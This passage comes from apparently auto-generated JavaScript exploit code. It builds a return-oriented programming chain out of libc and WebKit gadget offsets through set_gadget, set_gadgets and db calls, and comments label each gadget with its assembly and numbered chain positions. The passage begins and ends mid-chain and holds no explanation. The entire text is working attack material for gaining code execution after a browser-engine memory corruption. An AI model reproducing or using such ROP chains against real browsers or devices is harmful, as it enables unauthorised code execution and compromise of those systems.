libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+77904, //L297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+77920, //L298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77888, //L296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L296: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L297: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L298: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+78000, //L299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+78016, //L300 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L299: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L300: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+78104, //L301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+78120, //L303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L301: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L303: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L304: db([4294967283, 4294967295]); // -0xd set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+1121481, //mov [rax], cl libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L306: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+78280, //L309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+78264, //L307 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L307: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L309: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+78424, //L312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+78392, //L310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+78408, //L311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L310: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L311: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L312: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+78496, //L314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L314: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+78552, //L315 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L315: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+78632, //L317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L317: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L319: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+78752, //L322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+78736, //L320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L320: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L322: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+78928, //L325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+78944, //L326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+78896, //L323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+78912, //L324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L323: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L324: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L325: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L326: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+79056, //L327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+79088, //L329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+79072, //L328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L327: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L328: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L329: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+79176, //L331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, 
//mov rax, rcx libc_base+763368 //pop rcx ]); //L331: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+79232, //L332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L332: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+79376, //L335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+79392, //L336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+79360, //L334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L334: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L335: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L336: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+79552, //L340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+79520, //L338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+79536, //L339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L337: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L338: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L339: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L340: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+79608, //L342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L342: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, 
//pop rsi ropchain+79736, //L344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+79752, //L345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+79720, //L343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L343: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L344: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L345: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+79912, //L349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+79880, //L347 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+79896, //L348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L346: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L347: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L348: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L349: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+79968, //L351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L351: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+80096, //L353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+80112, //L354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+80080, //L352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L352: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 
//L353: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L354: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+80272, //L358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+80240, //L356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+80256, //L357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L355: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L356: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L357: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L358: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+80328, //L360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L360: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+80456, //L362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+80472, //L363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+80440, //L361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L361: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L362: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L363: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+80552, //L364 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+80568, //L365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L364: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L365: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+80728, //L369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+80696, //L367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+80712, //L368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L366: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L367: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L368: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L369: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+80784, //L371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L371: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+80912, //L373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+80928, //L374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+80896, //L372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L372: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L373: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L374: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+81024, //L376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+81008, //L375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L375: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax 
//L376: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+81104, //L377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L377: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L379: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+81224, //L382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+81208, //L380 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L380: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L382: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+81368, //L385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+81336, //L383 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+81352, //L384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L383: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L384: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L385: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+81440, //L387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L387: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+81496, //L388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, 
rcx libc_base+763368 //pop rcx ]); //L388: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L390: db([7, 0]); // 0x7 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+81624, //L391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L391: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L393: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+81744, //L396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+81728, //L394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L394: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L396: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+81920, //L399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+81936, //L400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+81888, //L397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+81904, //L398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L397: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L398: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L400: db([0, 0]); // 0x0 set_gadgets([ 
webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+82048, //L401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+82080, //L403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+82064, //L402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L401: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L402: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L403: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+82192, //L404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+82208, //L405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L404: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L405: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+82296, //L407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L407: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+82352, //L408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L408: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+764760, //pop rsi ropchain+82424, //L411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L411: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+82480, //L412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L412: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+82568, //L414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L414: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L416: db([4294967283, 4294967295]); // -0xd set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+82688, //L419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+82672, //L417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L417: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L419: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+82848, //L423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+82816, //L421 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+82832, //L422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L420: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L421: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L422: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L423: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+82904, //L425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L425: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+83032, //L427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+83048, //L428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83016, //L426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L426: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L427: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L428: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+83208, //L432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+83176, //L430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83192, //L431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L429: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L430: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L431: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L432: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+83264, //L434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L434: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+83392, //L436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+83408, //L437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83376, //L435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L435: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L436: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L437: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+83488, //L438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+83504, //L439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L438: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L439: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+83664, //L443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+83632, //L441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83648, //L442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L440: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L441: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L442: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L443: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+83720, //L445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L445: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+83848, //L447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] 
libc_base+764760, //pop rsi ropchain+83864, //L448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83832, //L446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L446: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L447: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L448: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+83960, //L450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+83944, //L449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L449: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L450: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+84040, //L451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L451: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L453: db([4294967288, 